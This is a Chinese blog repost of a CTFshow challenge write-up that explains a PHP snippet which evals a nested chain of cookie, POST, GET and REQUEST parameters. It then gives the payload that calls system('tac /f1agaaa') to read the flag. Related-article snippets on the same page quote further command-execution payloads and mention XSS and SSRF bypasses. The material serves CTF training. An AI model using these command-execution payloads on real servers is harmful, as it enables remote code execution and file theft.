CTFshow-菜狗杯-web签到

10月前作者：白泽安全分类：Toy博客阅读(35) 违法举报

这篇具有很好参考价值的文章主要介绍了CTFshow-菜狗杯-web签到。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

题目来源

CTFshow

考点

参数传递的获取、url编码、eval命令执行

源码

<?php

error_reporting(0);
highlight_file(__FILE__);

eval($_REQUEST[$_GET[$_POST[$_COOKIE['CTFshow-QQ群:']]]][6][0][7][5][8][0][9][4][4]);

解题思路

先是cookie传参

再是POST传参

再是GET传参

再是REQUEST传参

最后是eval命令执行

Payload

分析链接https://note.youdao.com/ynoteshare/index.html?id=def831ca8bef3926b1cb0e62249d6e88&type=note&_time=1670206729016

构造payload

?b=c&c[6][0][7][5][8][0][9][4][4]=system("tac /f1agaaa");
a=b
CTFshow-QQ%E7%BE%A4:=a

ctfshow菜狗杯web签到,CTF,WEB,参数传递,网络安全,web安全

得到flag文章来源地址https://www.toymoban.com/news/detail-701208.html

到了这里，关于CTFshow-菜狗杯-web签到的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

CTFshow-菜狗杯WP

经过了48小时的奋战，在这次比赛中成功拿下4400分，同时也发现了自己的许多不足；杂项签到下载附件后进行解压，发现是一张图片，通过二进制查看工具（WinHex/010 Editor）打开该图片，Ctrl+F搜索文本\\\"ctfshow\\\"，即可发现： ctfshow{a62b0b55682d81f7f652b26147c49040} 损坏的压缩包通过

2024年02月08日
浏览(40)
CTFshow-菜狗杯-misc（1-6）

杂项签到-flag直接放入16进制文件用winhex工具打开直接搜ctfshow就可以了（ctrl+F调出搜索框，注意选择ASCII编码，不是unicode）：损坏的压缩包-更改文件类型使用winhex打开，发现是png的格式特征，将文件后缀改成.png： png文件格式详解，其中辅助数据块可以略过。成功拿到f

2024年02月02日
浏览(85)
CTFShow web1-7——CTF秀WEB模块解题思路

CTFShow WEB模块详细通关教程, 受篇幅所限, 通关教程分为上下两部分, 第一部分为1-7关, 第二部分为8-14关, 本篇博客为1-7关的通关教程, 从解题思路和原理剖析两个方面进行讲解这一关的重点在于注释, 由于开发人员的疏忽, 忘记删除注释中的敏感数据, 右键检查网页源码即可拿到

2024年02月09日
浏览(38)
CTFshow web入门---web56

题目：题目分析：查看本题，发现本题为命令执行类题目，但是有一个很致命的点，那么就是他过滤了所有的字母和数字，以及一系列的符号。因此本题最值得推敲的点就是如何实现无字母数字的命令执行通过拜读P神的一篇文章，其中《无字母数字webshell之提高篇》讲到了

2023年04月22日
浏览(40)
ctfshow web入门 web141-145

1.web141 ^w+$表示在开头和末尾匹配字母数字_，传入的v3值不能有字母数字_，即无字母的命令执行 php中1-phpinfo()是可以执行的，加减乘除都可以实现这里或，异或，取反等运算都可以这里采用羽师傅的异或脚本生成payload payload: 2.web142 payload： 3.web143 过滤了取反,+,-等符号，还可

2024年02月22日
浏览(67)
ctfshow命令执行(web29-web52)

目录 web29 web30 web31 web32 web33 web34 web35 web36 web37 web38 web39 web40 web41 web42 web43 web44 web45 web46 web47 web48 web49 web50 web51 web52 代码解释判断是否存在GET型参数c 如果存在赋值给变量c 如果参数值没有匹配到字符串flag则执行代码 eval() 直接传参第一种方法 ?c=system(\\\'ls\\\'); ?c=system(\\\'tac f*\\\'); 第二

2024年01月20日
浏览(43)
CTFshow web入门 web316-web333 XSS

我tm又来了，总之top10先过一遍，到第三个XSS了，下一个要去看了，看了网上很多wp总感觉不是太全，所以就自己写了一个网站没有对用户提交的数据进行转义处理或者过滤不足，从而被恶意攻击者利用进而被添加一些恶意可执行脚本嵌入到web页面中去，使别的用户访问都会执

2024年02月03日
浏览(46)
ctfshow web入门 ssrf web351-355

尝试访问本机的flag.php payload: 必须要用http或https，ip没有过滤因为匹配时没加变量，恒为真 payload: 必须要用http或https,过滤了127.0.，只要匹配到了127.0.就不能继续执行了 windows 0代表0.0.0.0 linux 0代表 127.0.0.1 可以用0代替127.0.0.1 payload: 过滤了0和1，可以把域名解析到127.0.0.1 http:/

2024年02月05日
浏览(54)
ctfshow php特性(web89-web101)

目录 web89 web90 web91 web92 web93 web94 web95 web96 web97 web98 web99 web100 web101 php特性(php基础知识) preg_match 函数正则匹配0-9 如果匹配到就失败 intval将参数值转换为整数类型这就犯冲突了但是preg_match函数只能处理字符串当传入的是数组的时候就返回false 从而绕过die函数这时intval接收

2024年01月20日
浏览(44)
ctfshow愚人杯web复现

题目url base64解码是 face.png ，尝试 flag.txt 和 flag.php ，base64加密后传入都不对，用 index.php 加密后传入，看源码将后面的base64解密得到flag 源码先看怎么传参这一句话的意思是接收header头中 aaaaaa参数的值，就例如这样的然后提示说有一个txt，但不知道名字是什么，想办法读取

2023年04月09日
浏览(38)